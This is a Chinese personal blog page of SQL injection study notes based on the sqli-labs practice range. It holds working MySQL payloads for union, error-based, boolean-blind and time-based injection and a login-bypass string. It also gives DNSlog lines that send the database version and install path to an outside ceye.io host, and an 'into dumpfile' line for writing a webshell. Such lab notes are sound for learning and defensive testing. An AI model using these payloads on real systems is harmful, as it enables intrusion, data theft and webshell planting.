<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title>Web安全——注入 | 个人博客</title>
    <meta name="generator" content="VuePress 1.9.9">
    <link rel="icon" href="/wangdengdeng/favicon.ico">
    <meta name="description" content="个人博客">
    <meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no">
    
    <link rel="preload" href="/wangdengdeng/assets/css/0.styles.aece1d96.css" as="style"><link rel="preload" href="/wangdengdeng/assets/js/app.f1f99d8b.js" as="script"><link rel="preload" href="/wangdengdeng/assets/js/6.e2e47644.js" as="script"><link rel="preload" href="/wangdengdeng/assets/js/12.f671f075.js" as="script"><link rel="prefetch" href="/wangdengdeng/assets/js/10.03f88c15.js"><link rel="prefetch" href="/wangdengdeng/assets/js/11.72cf17ac.js"><link rel="prefetch" href="/wangdengdeng/assets/js/13.617d7347.js"><link rel="prefetch" href="/wangdengdeng/assets/js/14.593cb0fe.js"><link rel="prefetch" href="/wangdengdeng/assets/js/15.0e5ed7f1.js"><link rel="prefetch" href="/wangdengdeng/assets/js/16.62628b6e.js"><link rel="prefetch" href="/wangdengdeng/assets/js/17.0a9a378d.js"><link rel="prefetch" href="/wangdengdeng/assets/js/18.6562709a.js"><link rel="prefetch" href="/wangdengdeng/assets/js/19.4e5da212.js"><link rel="prefetch" href="/wangdengdeng/assets/js/2.53fca3c4.js"><link rel="prefetch" href="/wangdengdeng/assets/js/20.3d1af487.js"><link rel="prefetch" href="/wangdengdeng/assets/js/21.9b13d7a3.js"><link rel="prefetch" href="/wangdengdeng/assets/js/22.40df8487.js"><link rel="prefetch" href="/wangdengdeng/assets/js/23.e0f56263.js"><link rel="prefetch" href="/wangdengdeng/assets/js/24.28ee286e.js"><link rel="prefetch" href="/wangdengdeng/assets/js/25.00bc6ec8.js"><link rel="prefetch" href="/wangdengdeng/assets/js/26.2309cdc0.js"><link rel="prefetch" href="/wangdengdeng/assets/js/3.cb810e63.js"><link rel="prefetch" href="/wangdengdeng/assets/js/4.6efe2eb7.js"><link rel="prefetch" href="/wangdengdeng/assets/js/5.63f29a16.js"><link rel="prefetch" href="/wangdengdeng/assets/js/7.8704393b.js"><link rel="prefetch" href="/wangdengdeng/assets/js/8.8ab062d7.js"><link rel="prefetch" href="/wangdengdeng/assets/js/9.6d7262ea.js">
    <link rel="stylesheet" href="/wangdengdeng/assets/css/0.styles.aece1d96.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div id="global-layout" data-v-7f2e4136><header class="header-container" style="background-size:cover;background-repeat:no-repeat;background-position:center;background-attachment:scroll;background-image:url(/wangdengdeng/post-bg.jpeg);" data-v-93921ff8 data-v-7f2e4136><nav class="navbar" style="position:absolute;opacity:1;transition:all 0.5s ease-in-out;" data-v-93921ff8><a href="/wangdengdeng/" class="navbar-link router-link-active">
    
  </a> <ul class="navbar-links"><li><a href="/wangdengdeng/" class="router-link-active">
        主页
      </a></li><li><a href="/wangdengdeng/about/">
        关于作者
      </a></li><li><a href="/wangdengdeng/tags/">
        技术栈
      </a></li></ul> <div id="nav-icon"><span></span><span></span><span></span></div></nav> <div class="header-title" data-v-93921ff8 data-v-93921ff8><h1 data-v-93921ff8>Web安全——注入</h1> <p data-v-93921ff8></p></div></header> <div class="container" data-v-b3fda33c data-v-7f2e4136><main class="main" style="width:60%;" data-v-b3fda33c><div class="post" data-v-b3fda33c data-v-b3fda33c><article class="main-div"><div class="post-content content content__default"><p>本篇博客主要是对常见sql注入漏洞的总结</p> <p><img src="http://wangdengdeng.oss-cn-hangzhou.aliyuncs.com/img/image-20220313152608521.png" alt="image-20220313152608521"></p> <h1 id="一、注入"><a href="#一、注入" class="header-anchor">#</a> 一、注入</h1> <h2 id="sql注入攻击"><a href="#sql注入攻击" class="header-anchor">#</a> sql注入攻击</h2> <p>sqlmap会用，但是手注是真的硬性要求。</p> <h2 id="sql注入的两个标准条件"><a href="#sql注入的两个标准条件" class="header-anchor">#</a> sql注入的两个标准条件：</h2> <blockquote><p>1.在注入过程中，有可控的参数（即用户可以手动输入）</p> <p>2.可插入实现攻击的代码与参数传入过程的拼接。</p></blockquote> <h2 id="巧妙利用错误回显"><a href="#巧妙利用错误回显" class="header-anchor">#</a> 巧妙利用错误回显</h2> <p>将语句之中带入语法错误的内容，如果web服务器开启了==错误回显==，可以在回显的内容中得到数据库版本的信息，从而利用对应的注入语句。</p> <h2 id="关闭错误回显的盲注"><a href="#关闭错误回显的盲注" class="header-anchor">#</a> 关闭错误回显的盲注</h2> <p>在web服务器关闭了错误回显时，用到盲注可以判断是否存在sql注入。</p> <h3 id="原理"><a href="#原理" class="header-anchor">#</a> 原理</h3> <p>构造简单的条件判断语句，判断返回界面的变化。</p> <p>常见的判断and方法判断：</p> <p>1=1 	1=2</p> <h1 id="二、sqli-labs靶场"><a href="#二、sqli-labs靶场" class="header-anchor">#</a> 二、sqli-labs靶场：</h1> <h2 id="一、整数型注入"><a href="#一、整数型注入" class="header-anchor">#</a> 一、整数型注入</h2> <p>1.整数型注入：</p> <p>怎么判断注入类型？</p> <div class="language-python extra-class"><pre class="language-python"><code><span class="token operator">/</span>?<span class="token builtin">id</span><span class="token operator">=</span><span class="token number">1</span>   等于		<span class="token operator">/</span>?<span class="token builtin">id</span><span class="token operator">=</span><span class="token number">2</span><span class="token operator">-</span><span class="token number">1</span> 
</code></pre></div><p>针对于整数型和字符型的基本判断</p> <p>2.判断字段数</p> <div class="language-python extra-class"><pre class="language-python"><code>order by  或者	union select <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span>	
</code></pre></div><p>注：select 1之后有几位都可做回显位</p> <p>3.手注</p> <h2 id="二、字符型注入"><a href="#二、字符型注入" class="header-anchor">#</a> 二、字符型注入</h2> <p>1.判断类型同上</p> <p>2.根据回显错误判断是否有符号闭合  （<strong>==&quot;==</strong> <strong>=='==</strong>）</p> <p>3.字符型注入的注释：</p> <div class="language-python extra-class"><pre class="language-python"><code><span class="token operator">-</span><span class="token operator">-</span><span class="token operator">%</span><span class="token number">20</span>  <span class="token comment">#就是--空格，#号不好使了，艹</span>
</code></pre></div><p>==payload里必须用转义后的==</p> <h2 id="三、报错注入-error-based-sql-injection"><a href="#三、报错注入-error-based-sql-injection" class="header-anchor">#</a> 三、报错注入（Error-based SQL injection）</h2> <p>利用前提：在没有回显或回显不可控的情况下(页面上有没有显示位无所谓)，但是需要输出SQL语句执行错误信<br>
息，例如:mysqli_error()</p> <p>优点：不需要显示位
缺点：需要输出例如mysqli_error()的报错信息</p> <h3 id="报错注入中的floor注入详解"><a href="#报错注入中的floor注入详解" class="header-anchor">#</a> 报错注入中的floor注入详解：</h3> <p>Payload：</p> <div class="language-mysql extra-class"><pre class="language-text"><code>Union select count(*),concat((查询语句),0x26,floor(rand(0)*2))x from information_schema.columns group by x; 


AND (SELECT COUNT(*) FROM information_schema.`TABLES` GROUP BY CONCAT((payload),FLOOR(RAND(0)*2)));// 
通用
AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT(SELECT(payload) FROM information_schema.`TABLES` LIMIT 0,1),FLOOR(RAND(0)*2))X FROM information_schema.`TABLES` GROUP BY X)a)
//通用
</code></pre></div><ol><li></li></ol> <blockquote><p>select 1,2</p> <p>以1，2作为字段名，打印输出表中的所有信息（若无1，2则直接输出1，2在表中）如图：</p></blockquote> <ol start="2"><li></li></ol> <blockquote><p>count(*) 将所选中表的数据条数显示出来</p></blockquote> <ol start="3"><li></li></ol> <blockquote><p>floor(rand(0)*2))x</p> <p>floor是取小数点，向下取整，rand()将随机出现一个介于0，1之间的小数，但是rand(0)则根据数据条数的递增，成为一组固定数值，如图：</p> <p>乘以二取整之后前六位为011011，是一组固定的数字</p></blockquote> <blockquote><p>group by:</p> <p>group by key 在执行时循环读取数据的每一行，将结果保存于临时表中。读取每一行的key时，如果key存在于临时表中，则更新临时表中的数据（更新数据时，不再计算rand值）；如果该key不存在于临时表中，则在临时表中插入key所在行的数据。（插入数据时，会再计算rand值）</p> <p>简单的说，就是在执行分组语句时，会建立一个虚拟表，有相同数据直接存入，没有则新建</p> <p>问题出在当第一次计算的0插入时会再次进行计算rand，得到1插入，再算下一个是1，直接加加，再下一个是0，发现没有0，要插入，但插入时**==再次计算==**发现是1，且已经存在1了，此时有冲突，就会报错。</p></blockquote> <h3 id="报错注入的其他函数"><a href="#报错注入的其他函数" class="header-anchor">#</a> 报错注入的其他函数</h3> <p><strong>updatexml</strong>函数</p> <blockquote><p>报错的原理：</p> <p>因为在<strong>updatexml</strong>函数传参中，第二位Xpath路径错误即会报错</p></blockquote> <p><img src="http://wangdengdeng.oss-cn-hangzhou.aliyuncs.com/img/image-20220309191541284.png" alt="image-20220309191541284"></p> <p>具有查询功能 并且会再xpath处查询 你将语法构造错误 然后它就会将他查询的结果已报错的形式显示出来</p> <p>payload：</p> <div class="language-mysql extra-class"><pre class="language-text"><code>and updatexml(1,concat(0x7e,(select (select table_name from information_schema.tables where table_schema= '库名' limit 0,1)),0x7e),1) --%20

and updatexml(1,concat(0x7e,(select (select column_name from information_schema.columns where table_name= '表名' limit 0,1)),0x7e),1)

and updatexml(1,concat(0x7e,(select (select id from 库名.表名 limit 0,1)),0x7e),1)
</code></pre></div><p><strong>limit的用法</strong></p> <blockquote><p>limit i,n</p></blockquote> <p>默认输出从i条==开始==的==前==n条数据，所以在查询表名或字段名不符合想法的，换1，1，这样挨个检索要求找到的信息。</p> <p><strong>extractvalue()</strong></p> <div class="language-mysql extra-class"><pre class="language-text"><code>extractvalue(1,concat())  #用法同上
</code></pre></div><p><code>extractvalue(xml_frag,xpath_expr)</code></p> <p>函数接受两个参数，第一个为XML标记内容，也就是查询的内容，第二个为XPATH路径，也就是查询的路径。如果没有匹配内容，不管出于何种原因，只要 xpath_expr有效，并且 xml_frag由正确嵌套和关闭的元素组成 - 返回空字符串。不区分空元素的匹配和无匹配。但是如果XPATH写入错误格式，就会报错，并且返回我们写入的非法内容</p> <h5 id="报错注入的判断"><a href="#报错注入的判断" class="header-anchor">#</a> 报错注入的判断</h5> <p>有可能用到报错注入的错误信息：</p> <p><img src="http://wangdengdeng.oss-cn-hangzhou.aliyuncs.com/img/image-20220309192136465.png" alt="image-20220309192136465"></p> <p>无效报错：</p> <p><img src="http://wangdengdeng.oss-cn-hangzhou.aliyuncs.com/img/image-20220309192203228.png" alt="image-20220309192203228"></p> <h2 id="四、布尔注入-bp-上述报错无效。。"><a href="#四、布尔注入-bp-上述报错无效。。" class="header-anchor">#</a> 四、布尔注入+bp（上述报错无效。。）</h2> <h5 id="substr"><a href="#substr" class="header-anchor">#</a> substr:</h5> <p><img src="http://wangdengdeng.oss-cn-hangzhou.aliyuncs.com/img/image-20220309195001926.png" alt="image-20220309195001926"></p> <div class="language-php extra-class"><pre class="language-php"><code><span class="token operator">?</span>id<span class="token operator">=</span> <span class="token number">1</span> <span class="token keyword">and</span> <span class="token function">length</span><span class="token punctuation">(</span><span class="token function">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token operator">&gt;=</span>x <span class="token comment">// 判断/猜测库名的长度</span>
     <span class="token number">1</span> <span class="token keyword">and</span> <span class="token function">substr</span><span class="token punctuation">(</span><span class="token function">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token string single-quoted-string">'a'</span> <span class="token comment">//取得库名的第一个字母，引申一下就是获取整个库名。（使用bp抓包，在从第几个子符开始也就是第二个参数  和  =后的a  添加有效负载位置，并调整攻击类型为Cb，进行爆破，后续语句相同的bao）  </span>
     <span class="token number">1</span> <span class="token keyword">and</span> <span class="token function">substr</span><span class="token punctuation">(</span><span class="token punctuation">(</span>select table_name from information_schema<span class="token operator">.</span>tables where table_schema<span class="token operator">=</span><span class="token string single-quoted-string">'sqli'</span> limit <span class="token number">0</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token string single-quoted-string">'a'</span> <span class="token comment">//limit含义：limit 1，2 . 1为从第一个位置开始，2为调用条数为两条  位置仍为第二个参数和等号后的a。   //得到表名。</span>
     注意：若第一个表不为flag所在表则需要将limit后第一个参数改为<span class="token number">1</span>，即从<span class="token number">0</span>位置之后的一个位置开始查询，直到找到flag所在表为止。
     <span class="token number">1</span> <span class="token keyword">and</span> <span class="token function">substr</span><span class="token punctuation">(</span><span class="token punctuation">(</span>select column_name from information_schema<span class="token operator">.</span>columns where table_name<span class="token operator">=</span><span class="token string single-quoted-string">'flag'</span> limit <span class="token number">0</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token string single-quoted-string">'a'</span> <span class="token comment">//取字段名 设置参数位置相同</span>
     <span class="token number">1</span> <span class="token keyword">and</span> <span class="token function">substr</span><span class="token punctuation">(</span><span class="token punctuation">(</span>select flag from flag<span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token string single-quoted-string">'a'</span>  <span class="token comment">//得到flag</span>
    
    
    
    id<span class="token operator">=</span><span class="token number">1</span> <span class="token keyword">AND</span> <span class="token function">USER</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token constant">REGEXP</span> <span class="token string single-quoted-string">'root@'</span><span class="token punctuation">;</span>   <span class="token operator">--</span> regexp<span class="token punctuation">:</span>包含	，用于直接猜
</code></pre></div><p>祖传的这一手<strong>bp爆破</strong>不能丢~~</p> <p><img src="http://wangdengdeng.oss-cn-hangzhou.aliyuncs.com/img/image-20220309201955461.png" alt="image-20220309201955461"></p> <h2 id="五、无报错-无回显的状况-延时注入"><a href="#五、无报错-无回显的状况-延时注入" class="header-anchor">#</a> 五、无报错，无回显的状况——延时注入</h2> <p><strong>sleep(n)</strong></p> <p>延时时间为n<strong>秒</strong></p> <div class="language-mysql extra-class"><pre class="language-text"><code>?id=1' and sleep(5) --%20  #判断是否有闭合
</code></pre></div><p><strong>if（条件，为真返回，为假返回）</strong></p> <p><img src="http://wangdengdeng.oss-cn-hangzhou.aliyuncs.com/img/image-20220309203300247.png" alt="image-20220309203300247"></p> <div class="language-mysql extra-class"><pre class="language-text"><code> and if(substr(database(),1,1)='s',sleep(5),1)--%20
</code></pre></div><p>爆库名就同理了~</p> <h2 id="六、结合登录界面的注入"><a href="#六、结合登录界面的注入" class="header-anchor">#</a> 六、结合登录界面的注入</h2> <p>登陆的万能密码：</p> <div class="language-mysql extra-class"><pre class="language-text"><code>1' or 1=1#
</code></pre></div><p><strong>再次：</strong></p> <p><img src="http://wangdengdeng.oss-cn-hangzhou.aliyuncs.com/img/image-20220312205232950.png" alt="image-20220312205232950"></p> <p>原理：</p> <p>说白了，or的用法就是想让掩护掉用户名的错误从而进入攻击阶段，所以在进行攻击时，构造payload时，当然就只能</p> <p>使用==or==的用法。</p> <div class="language-sql extra-class"><pre class="language-sql"><code>瞎写的用户名（闭合） <span class="token operator">or</span> 注入语句
</code></pre></div><p>法一：在万能密码使用之后，如果会回显用户名，则直接用户名登陆，即<code>admin’ union 语句</code>,无回显<strong>报错注入</strong></p> <p>法二：直接尝试联合注入语句，有可能直接能注进去。</p> <p>除常规闭合之外，尝试用户名+密码都写一下</p> <h2 id="七、dnslog外带注入"><a href="#七、dnslog外带注入" class="header-anchor">#</a> 七、DNSlog外带注入</h2> <p>讲解原理：</p> <p><img src="http://wangdengdeng.oss-cn-hangzhou.aliyuncs.com/img/image-20220317103057355.png" alt="image-20220317103057355"></p> <p>除了利用dnslog外带能够进行注入之外，还可以传马进行文件上传或者XSS的利用</p> <p>特别注意，申请域名的网站dnslog.cn和ceye在登陆时要用流量，不要用==校园网==</p> <p>payload展示：</p> <p>==千万记住==</p> <p>1.在使用paylaod爆到的信息未能在ceye找到dns记录时，要及时**hex()**转码转为16进制，因为某些敏感字符的原因</p> <p><strong>2</strong>.在爆破路径中，==63==的参数是由于二级域名长度的限制导致的问题，利用substr分段截取，然后拼接</p> <div class="language-sql extra-class"><pre class="language-sql"><code>直接利用：
<span class="token operator">/</span>?id<span class="token operator">=</span> <span class="token operator">and</span> <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token keyword">select</span> load_file<span class="token punctuation">(</span>concat<span class="token punctuation">(</span><span class="token string">'\\\\'</span><span class="token punctuation">,</span><span class="token punctuation">(</span><span class="token keyword">select</span> version<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token string">'.5pkcu2.ceye.io\\abc'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">0</span><span class="token punctuation">)</span> 

爆数据库路径：
LOAD_FILE<span class="token punctuation">(</span>CONCAT<span class="token punctuation">(</span><span class="token string">'\\\\'</span><span class="token punctuation">,</span><span class="token punctuation">(</span>SUBSTR<span class="token punctuation">(</span>HEX<span class="token punctuation">(</span>@<span class="token variable">@basedir</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">60</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token string">'.5pkcu2.ceye.io\\abc'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

传马：
<span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token string">''</span><span class="token punctuation">,</span><span class="token string">''</span><span class="token punctuation">,</span><span class="token string">'shell'</span> <span class="token keyword">into</span> <span class="token keyword">dumpfile</span> <span class="token string">'C:\Users\Xiaowang\Tools\phpstudy\fuck.php'</span>
<span class="token comment">#注意！！！</span>
<span class="token comment">#传马中的物理路径要反斜线(sql语句的特殊性)</span>

</code></pre></div><h2 id="八、基于请求消息的注入"><a href="#八、基于请求消息的注入" class="header-anchor">#</a> 八、基于请求消息的注入</h2> <p>ua注入以及referer注入</p> <p><strong>payload</strong></p> <div class="language-sql extra-class"><pre class="language-sql"><code><span class="token string">' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '</span>
</code></pre></div></div></article> <div class="main-div vssue"><!----></div></div></main> <aside class="aside" data-v-b3fda33c data-v-b3fda33c><div class="info-card main-div" data-v-1311ce9e data-v-b3fda33c><div class="info-card-header" style="background-size:cover;background-repeat:no-repeat;background-position:center;background-attachment:scroll;background-image:url(/wangdengdeng/avatar-bg.jpeg);" data-v-1311ce9e><img src="/wangdengdeng/avatar-top.jpeg" alt="WangDengdeng" class="info-avatar" data-v-1311ce9e></div> <div class="info-card-body" data-v-1311ce9e><section class="info-name" data-v-1311ce9e>
      WangDengdeng
    </section> <section class="info-desc" data-v-1311ce9e>I am a slow walker, but I never walk backwards.<br/>道阻且长,行则将至</section> <section class="info-contact" data-v-1311ce9e><section data-v-1311ce9e><span data-v-1311ce9e data-v-1311ce9e><svg class="icon" style="font-size:1em;" data-v-1311ce9e data-v-1311ce9e><use xlink:href="#icon-location" data-v-1311ce9e data-v-1311ce9e></use></svg><span class="info-text" data-v-1311ce9e data-v-1311ce9e>
          China
        </span></span></section> <!----> <section data-v-1311ce9e><span data-v-1311ce9e data-v-1311ce9e><svg class="icon" style="font-size:1em;" data-v-1311ce9e data-v-1311ce9e><use xlink:href="#icon-email" data-v-1311ce9e data-v-1311ce9e></use></svg><span class="info-text" data-v-1311ce9e data-v-1311ce9e>
          jimmybutler19@163.com
        </span></span></section></section></div> <div class="info-card-footer" data-v-1311ce9e><p class="footer-sns-link" data-v-1311ce9e></p></div></div> <div class="post-toc main-div aside-toc" style="position:relative;top:0;width:0px;" data-v-b3fda33c><h4>- CATALOG</h4> <div class="post-nav-toc"><ul><li><a href="/wangdengdeng/posts/2021/03/26/web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%B3%A8%E5%85%A5.html#sql注入攻击">sql注入攻击</a></li><li><a href="/wangdengdeng/posts/2021/03/26/web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%B3%A8%E5%85%A5.html#sql注入的两个标准条件">sql注入的两个标准条件：</a></li><li><a href="/wangdengdeng/posts/2021/03/26/web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%B3%A8%E5%85%A5.html#巧妙利用错误回显">巧妙利用错误回显</a></li><li><a href="/wangdengdeng/posts/2021/03/26/web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%B3%A8%E5%85%A5.html#关闭错误回显的盲注">关闭错误回显的盲注</a><ul><li><a href="/wangdengdeng/posts/2021/03/26/web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%B3%A8%E5%85%A5.html#原理">原理</a></li></ul></li><li><a href="/wangdengdeng/posts/2021/03/26/web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%B3%A8%E5%85%A5.html#一、整数型注入">一、整数型注入</a></li><li><a href="/wangdengdeng/posts/2021/03/26/web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%B3%A8%E5%85%A5.html#二、字符型注入">二、字符型注入</a></li><li><a href="/wangdengdeng/posts/2021/03/26/web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%B3%A8%E5%85%A5.html#三、报错注入-error-based-sql-injection">三、报错注入（Error-based SQL injection）</a><ul><li><a href="/wangdengdeng/posts/2021/03/26/web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%B3%A8%E5%85%A5.html#报错注入中的floor注入详解">报错注入中的floor注入详解：</a></li><li><a href="/wangdengdeng/posts/2021/03/26/web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%B3%A8%E5%85%A5.html#报错注入的其他函数">报错注入的其他函数</a></li></ul></li><li><a href="/wangdengdeng/posts/2021/03/26/web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%B3%A8%E5%85%A5.html#四、布尔注入-bp-上述报错无效。。">四、布尔注入+bp（上述报错无效。。）</a></li><li><a href="/wangdengdeng/posts/2021/03/26/web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%B3%A8%E5%85%A5.html#五、无报错-无回显的状况-延时注入">五、无报错，无回显的状况——延时注入</a></li><li><a href="/wangdengdeng/posts/2021/03/26/web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%B3%A8%E5%85%A5.html#六、结合登录界面的注入">六、结合登录界面的注入</a></li><li><a href="/wangdengdeng/posts/2021/03/26/web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%B3%A8%E5%85%A5.html#七、dnslog外带注入">七、DNSlog外带注入</a></li><li><a href="/wangdengdeng/posts/2021/03/26/web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%B3%A8%E5%85%A5.html#八、基于请求消息的注入">八、基于请求消息的注入</a></li></ul></div></div></aside></div> <footer class="footer" data-v-7f2e4136><p class="footer-sns-link"></p> <div class="copyright"><span id="custom">Copyright &copy; WADE_2ng 2020 <br /> 
        Theme By <a href="https://www.vuepress.cn/" target="_blank">VuePress</a></span> <!----></div></footer></div><div class="global-ui"><!----><!----></div></div>
    <script src="/wangdengdeng/assets/js/app.f1f99d8b.js" defer></script><script src="/wangdengdeng/assets/js/6.e2e47644.js" defer></script><script src="/wangdengdeng/assets/js/12.f671f075.js" defer></script>
  </body>
</html>
